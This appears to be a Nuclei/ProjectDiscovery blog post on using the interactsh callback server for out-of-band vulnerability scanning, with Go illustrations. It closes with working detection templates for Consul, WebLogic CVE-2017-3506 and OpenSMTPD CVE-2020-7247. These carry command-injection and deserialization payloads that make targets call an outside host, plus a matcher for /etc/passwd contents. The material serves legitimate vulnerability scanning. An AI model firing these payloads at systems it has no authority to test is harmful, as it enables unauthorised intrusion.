Nuclei + Interactsh Integration for Automating OOB Testing

We released interactsh, a server that emulates DNS, HTTP, HTTPS and SMTP services, allowing users to test for out-of-band (OOB) security vulnerabilities.

Nuclei v2.3.6 now supports the interact.sh API for OOB-based vulnerability scanning, with automatic request correlation built in. It's as easy as writing {{interactsh-url}} anywhere in the request and adding a matcher on the interactsh_protocol part. Nuclei handles correlating each interaction back to the template and the request it was generated from, allowing effortless OOB scanning.

How does it work?

The nuclei engine checks for matchers on the interactsh_protocol part; if one is present, interactsh support is enabled for that request. The request is then scanned for {{interactsh-url}} placeholders, and each one found is replaced on the fly with a random, unique interact.sh URL, which nuclei then polls continuously for interactions.

The support is designed so that a single poll request retrieves all interactions for any number of unique URLs generated during a nuclei session. Internally, nuclei keeps an LRU cache of the outstanding requests, with a maximum size tunable via the -interactions-cache-size flag. By default this is 5000 requests, with entries evicted every 60 seconds, and nuclei polls for interactions every 5 seconds.

You can also use a self-hosted interactsh server with nuclei by passing its URL with the -interactsh-url flag; by default nuclei uses https://interact.sh.

Placeholder Support

{{interactsh-url}} placeholder is supported in http and network requests.

An example of a nuclei request using {{interactsh-url}} placeholders is shown below. They are replaced at runtime with unique interact.sh URLs.

```yaml
- raw:
    - |
      GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
      Host: {{Hostname}}
```
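To make the placeholder replacement and correlation described above concrete, here is an added Go example. It is written for this article and is not nuclei's or interactsh's own code; the names Correlator, ReplacePlaceholders, Correlate and EvictOlderThan are assumptions for the illustration. It swaps every {{interactsh-url}} for a random unique hostname, records which template and request emitted that label in a size-bounded LRU cache with time-based expiry (the 5000-entry / 60-second defaults from the post are just parameters here), and maps the label carried by a polled interaction back to its origin. The network poll itself is not simulated: Correlate takes the unique label an interaction would carry.

```go
package main

import (
	"container/list"
	"crypto/rand"
	"encoding/hex"
	"strings"
	"time"
)

// Placeholder is the token nuclei replaces in raw requests.
const Placeholder = "{{interactsh-url}}"

// RequestInfo records which template/request emitted a unique hostname and when.
type RequestInfo struct {
	TemplateID string
	RequestIdx int
	Created    time.Time
}

type entry struct {
	id   string
	info RequestInfo
}

// Correlator is a size-bounded LRU mapping unique labels to their origin,
// modelled on the cache the post describes (hypothetical names, not nuclei's code).
type Correlator struct {
	domain  string
	maxSize int
	order   *list.List               // front = most recently used
	entries map[string]*list.Element // label -> element holding *entry
}

func NewCorrelator(domain string, maxSize int) *Correlator {
	return &Correlator{domain: domain, maxSize: maxSize, order: list.New(), entries: map[string]*list.Element{}}
}

// newUniqueID returns a random hex label (nuclei uses its own random string).
func newUniqueID() string {
	b := make([]byte, 8)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return hex.EncodeToString(b)
}

// ReplacePlaceholders swaps every placeholder in body for a fresh unique hostname
// and registers each label against the request that emitted it.
func (c *Correlator) ReplacePlaceholders(body, templateID string, requestIdx int) (string, []string) {
	var ids []string
	for strings.Contains(body, Placeholder) {
		id := newUniqueID()
		ids = append(ids, id)
		info := RequestInfo{TemplateID: templateID, RequestIdx: requestIdx, Created: time.Now()}
		c.entries[id] = c.order.PushFront(&entry{id: id, info: info})
		if c.order.Len() > c.maxSize { // cache full: drop the least recently used label
			c.remove(c.order.Back())
		}
		body = strings.Replace(body, Placeholder, id+"."+c.domain, 1)
	}
	return body, ids
}

func (c *Correlator) remove(el *list.Element) {
	delete(c.entries, el.Value.(*entry).id)
	c.order.Remove(el)
}

// EvictOlderThan drops labels registered more than maxAge before now, the
// periodic expiry the post puts at 60 seconds; it returns how many were dropped.
func (c *Correlator) EvictOlderThan(maxAge time.Duration, now time.Time) int {
	n := 0
	for el := c.order.Back(); el != nil; {
		prev := el.Prev()
		if now.Sub(el.Value.(*entry).info.Created) > maxAge {
			c.remove(el)
			n++
		}
		el = prev
	}
	return n
}

// Correlate maps the unique label of a polled interaction (the part before
// the interactsh domain) back to the template and request that produced it.
func (c *Correlator) Correlate(uniqueID string) (RequestInfo, bool) {
	el, ok := c.entries[uniqueID]
	if !ok {
		return RequestInfo{}, false
	}
	c.order.MoveToFront(el)
	return el.Value.(*entry).info, true
}

// Len reports how many labels are currently tracked.
func (c *Correlator) Len() int { return c.order.Len() }
```

The point of the LRU bound is that a long scan cannot grow the correlation table without limit: once the cache is full, the label least recently touched by an interaction is forgotten, and any late interaction for it is reported as uncorrelated rather than attributed to the wrong template.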

Matching for Interactions

Matching is straightforward with the interactsh nuclei integration. Just add a standard nuclei word, regex or dsl matcher/extractor with one of the following parts:

  1. interactsh_protocol - Value can be dns, http or smtp. This is the standard matcher for every interactsh-based template, with dns the most common value as it is very non-intrusive in nature.
  2. interactsh_request - The request that the interact.sh server received.
  3. interactsh_response - The response that the interact.sh server sent to the client.

```yaml
matchers:
  - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
      - "dns"
```

These interactsh-specific matchers can be combined with matchers on the parts of the request such as body or raw, using matchers-condition: and, to achieve precise scanning.

```yaml
matchers-condition: and
matchers:
  - type: word
    part: interactsh_protocol # Confirms the DNS Interaction
    words:
      - "dns"

  - type: regex
    part: interactsh_request # Confirms the retrieval of etc/passwd file
    regex:
      - "root:[x*]:0:0:"

  - type: status
    status:
      - 200
```
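As an added example of how the three interactsh parts and matchers-condition combine, the Go code below evaluates word and regex matchers over two constructed interactions. It is not nuclei's matcher engine: the Interaction field names and the Matcher, Match and Evaluate helpers are assumptions for this illustration, and the sample DNS and HTTP records are made up. A part that is not interaction data, such as status or body in the YAML above, is deliberately left unresolved here, because those values come from the target's HTTP response rather than from the interactsh server.

```go
package main

import (
	"regexp"
	"strings"
)

// Interaction is one record as an interactsh poll returns it; the field names
// are assumptions for this example, mapped to the three template parts.
type Interaction struct {
	Protocol string // interactsh_protocol: "dns", "http" or "smtp"
	Request  string // interactsh_request: what the server received
	Response string // interactsh_response: what the server sent back
}

// Matcher carries the YAML fields used on the page: type, part and words/regex.
type Matcher struct {
	Type   string   // "word" or "regex"
	Part   string   // interactsh_protocol, interactsh_request or interactsh_response
	Values []string // any one value matching is enough, as with nuclei's words/regex lists
}

// partValue picks the interaction field a matcher's part refers to.
func partValue(in Interaction, part string) (string, bool) {
	switch part {
	case "interactsh_protocol":
		return in.Protocol, true
	case "interactsh_request":
		return in.Request, true
	case "interactsh_response":
		return in.Response, true
	}
	return "", false // response parts such as body or status are not interaction data
}

// Match reports whether one matcher is satisfied by the interaction.
func (m Matcher) Match(in Interaction) bool {
	value, ok := partValue(in, m.Part)
	if !ok {
		return false
	}
	for _, v := range m.Values {
		switch m.Type {
		case "word":
			if strings.Contains(value, v) {
				return true
			}
		case "regex":
			if re, err := regexp.Compile(v); err == nil && re.MatchString(value) {
				return true
			}
		}
	}
	return false
}

// Evaluate applies matchers-condition ("and" or "or") across the matcher list.
func Evaluate(condition string, matchers []Matcher, in Interaction) bool {
	for _, m := range matchers {
		hit := m.Match(in)
		if condition == "and" && !hit {
			return false
		}
		if condition != "and" && hit {
			return true
		}
	}
	return condition == "and"
}

// Constructed sample interactions, not real captures. The HTTP one models a
// callback whose body carries /etc/passwd content, which the page's regex targets.
var (
	SampleDNS = Interaction{
		Protocol: "dns",
		Request:  ";; QUESTION SECTION:\n;c5k2v3abcd.interact.sh.\tIN\tA\n",
		Response: ";; ANSWER SECTION:\nc5k2v3abcd.interact.sh.\t3600\tIN\tA\t198.51.100.1\n",
	}
	SampleHTTP = Interaction{
		Protocol: "http",
		Request:  "POST / HTTP/1.1\r\nHost: c5k2v3abcd.interact.sh\r\n\r\nroot:x:0:0:root:/root:/bin/bash\n",
		Response: "HTTP/1.1 200 OK\r\n\r\n<html><body>c5k2v3abcd.interact.sh</body></html>\n",
	}
)
```

With matchers-condition: and, a DNS-only interaction never satisfies a matcher set that also requires content in interactsh_request, which is why the passwd regex in the YAML above only fires when the callback actually carried the file contents; with or, the protocol word alone is enough.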

Some Examples

The template below is an example demonstration of nuclei's OOB capabilities. It detects the HashiCorp Consul Services API RCE using the interact.sh OOB server.

```yaml
id: hashicorp-consul-rce

info:
  name: Hashicorp Consul Services Api RCE
  author: pikpikcu
  severity: critical
  reference: https://www.exploit-db.com/exploits/46074
  tags: hashicorp,rce,oob

requests:
  - raw:
      - | # Create USER
        PUT /v1/agent/service/register HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Length: 205

        {
          "ID": "{{randstr}}",
          "Name": "{{randstr}}",
          "Address": "127.0.0.1",
          "Port": 80,
          "check": {
            "script": "nslookup {{interactsh-url}}",
            "interval": "10s",
            "Timeout": "86400s"
          }
        }
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
```

The template below detects a WebLogic RCE via deserialization using nuclei's interact.sh OOB server.

```yaml
id: CVE-2017-3506

info:
  name: Oracle Weblogic Remote OS Command Execution
  author: pdteam
  description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
  severity: high
  tags: cve,cve2017,weblogic,oracle,rce,oob
  reference: |
    - https://hackerone.com/reports/810778
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
requests:
  - raw:
      - |
        POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
        Content-Type: text/xml;charset=UTF-8
        Content-Length: 873

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java version="1.8" class="java.beans.XMLDecoder">
                <void id="url" class="java.net.URL">
                  <string>http://{{interactsh-url}}</string>
                </void>
                <void idref="url">
                  <void id="stream" method ="openStream"/>
                </void>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
```

A network template for OpenSMTPD that detects RCE via an OOB request is also given below.

```yaml
id: CVE-2020-7247
info:
  name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
  author: princechaddha
  severity: critical
  reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
  tags: cve,cve2020,smtp,opensmtpd,network,rce

network:
  - inputs:
      - read: 1024
      - data: "helo target\r\n"
        read: 1024
      - data: "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
        read: 1024
      - data: "RCPT TO:<root>\r\n"
        read: 1024
      - data: "DATA\r\n"
        read: 1024
      - data: "\r\nxxxx\r\n.\r\n"
        read: 1024
      - data: "QUIT\r\n"
        read: 1024
    host:
      - "{{Hostname}}:25"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: raw
        words:
          - "Message accepted for delivery"
```

Got questions about Interactsh or the nuclei integration? Feel free to tweet us at @pdnuclei or jump into our Discord server to discuss more security and automation.